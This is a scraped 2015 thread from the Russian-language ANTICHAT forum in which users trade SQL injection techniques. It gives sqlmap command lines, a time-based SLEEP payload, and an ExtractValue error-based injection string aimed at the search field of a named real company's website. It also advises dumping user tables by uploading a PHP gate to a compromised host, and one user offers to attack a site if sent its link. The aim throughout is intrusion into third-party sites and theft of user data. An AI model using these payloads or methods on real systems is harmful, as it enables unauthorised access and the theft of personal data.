ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
01.03.2015, 16:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от andrxx
andrxx said:
есть, но необходимо наличие фтп или цпанель
ftp://site.com - доступ требует авторизацию, ЦП панель так же требует авторизацию. Ну и какой способ
|
|
|
|
01.03.2015, 16:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
55516
Репутация:
0
|
|
Сообщение от lifescore
lifescore said:
./sqlmap.py --headers="
User-Agent: Mozilla/5.0 Gecko/20120101 Firefox/26.0
" --cookie="
%Query_Cookie%
" -u '
http://url.com/path/?id=1
' --level=5 risk=3 -p
%Parametr%
Или
-r
и путь к файлу с HTTP запросом
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]POST[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]vuln[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php HTTP[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]1.1
Host[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]target[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com
User[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]Agent[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Mozilla[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]4.0
id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR]
Способ на первый взгляд сработал, вектор запросов найден, timebased SQL, я дошёл до финальной стадии когда SQLmap предлагает ввести произвольный SQL запрос и выполнить его, однако он не выполняется, на любой запрос выводит none
Пробую способ:
./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL"
Вектор атаки найден:
Payload: User-Agent: Mozilla/5.0 Gecko/20120101') AND SLEEP(5)#
Однако, в SQL иньекции фильтруются запятые, а так как я не силен в timebased векторах, то даже предположить не могу, возможно ли провести timebased атаку без запятых и выполнить грубо говоря запрос select password from user
После найденного вектора запускаю скрипт:
./sqlmap.py --headers="User-Agent: Mozilla/5.0 Gecko/20120101 *" -u "http://url.com/path/?id=1" --level=5 risk=3 --dbms="MySQL" --sql-query="SELECT user()"
Он ждет минут 5-10 в retrieved:, пытается выполнить запрос и вытащить ответ, и по истечению времени вываливает:
SELECT user(): None
И так на любой SQL запрос. И вот вопрос, это из за запятых невозможно провести атаку, или я что то не так делаю? Подскажите пожалуйста!
|
|
|
|
01.03.2015, 16:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Интересует вывод таблиц из этой инъекции:
Код:
Code:
http://naftogaz-europe.com
Note:в поле поиск ' |
|
|
|
01.03.2015, 17:28
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Интересует вывод таблиц из этой инъекции:
Код:
Code:
http://naftogaz-europe.com
Note:
в поле поиск
''or(ExtractValue(1,concat(0x3a,(select(table_name) from(information_schema.tables)limit/**/0,1))))='1
|
|
|
03.03.2015, 06:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
|
|
|
|
03.03.2015, 07:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
2764
Репутация:
0
|
|
Сообщение от MaxFast
MaxFast said:
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
mysqldump
|
|
|
|
03.03.2015, 15:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
168184
Репутация:
40
|
|
Сообщение от MaxFast
MaxFast said:
Каким образом под никсами слить огромную таблицу с юзерами? SQLMap даже не может.
SQLYog. PHP Gate кидаешь на хост, где mysql расположен, с компа подключаешься.
Единственный минус - будет долго рожать.
Базы от нескольких гб - от получаса.
Зато валидный дамп, что не может не радовать.
|
|
|
|
05.03.2015, 01:21
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
Провел на форуме:
4776
Репутация:
0
|
|
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
|
|
|
|
05.03.2015, 02:34
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Xsite
Xsite said:
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
слить быстрее через инъекцию основанную на задержках? ну не знаю склмап не всегда точно может определить подходящий для случая вектор, поэтому пробуйте сначала руками, и если есть другие варианты — автоматизируйте сами.
|
|
|
|
05.03.2015, 10:24
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Xsite
Xsite said:
Ребят помогите советом )
При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
Есть замечательный вектор превращения Time-Based в Error-Based. Работает много где.
Могу показать, если дашь линк.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид